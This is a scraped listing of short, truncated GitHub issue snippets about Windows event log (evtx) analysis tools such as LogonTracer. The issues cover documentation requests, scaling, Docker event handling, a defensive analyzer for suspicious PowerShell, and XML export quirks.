-
-
Hi do you have any docs on how to use this lib?
Also, any plans to make it dump to xml like evtx_dump.py . Would be pretty handy... TIA!
-
Can we use LogonTracer to monitor logs in a company that generates 1 Gbt (300k event) evtx file per hour?
-
Docker cannot delete default event files. Is it possible to perform event initialization?
Dockerはデフォルトのイベントファイルを削除できません。イベントの初期化を行うことは可能ですか?
I was able to successfully import the event, but there …
-
to switch from live log to offline file
https://github.com/bodik/defender/blob/923dbe3120692ec0f29c1924d8d7c3141744d5a5/tools/windows/toolbox/eventlog-services.ps1#L15
`$events = Get-WinEvent -F…
bodik updated
5 years ago
-
Create an analyzer to tag suspicious PowerShell activity to detect things such as a base64 payload, usage of a pen testing framework such as PowerShell empire, etc. The following presentation link giv…
-
> flannel version
C:\opt\bin\rancher-wins-flanneld.exe --version
- label container log names
- grab evtx files in addition to json
- refactor
- better organize directories (top-level d…
-
Hi,
When providing an evtx to the software, the nodes of the parent processes do not necessarily have a name because it is not specified in the transformer. This patch is used to display it.
![n…
-
I saw that the csv-timeline and json-timeline commands support deduplication using the flag `--remove-duplicate-detections`. I think that is incredibly useful. Unfortunately the logon-summary does not…
-
**Note that Windows Event Log XML output (as exported by Windows EventViewer) is not necessary proper XML.** Also see: https://github.com/dfirlabs/evtx-specimens and https://github.com/log2timeline/pl…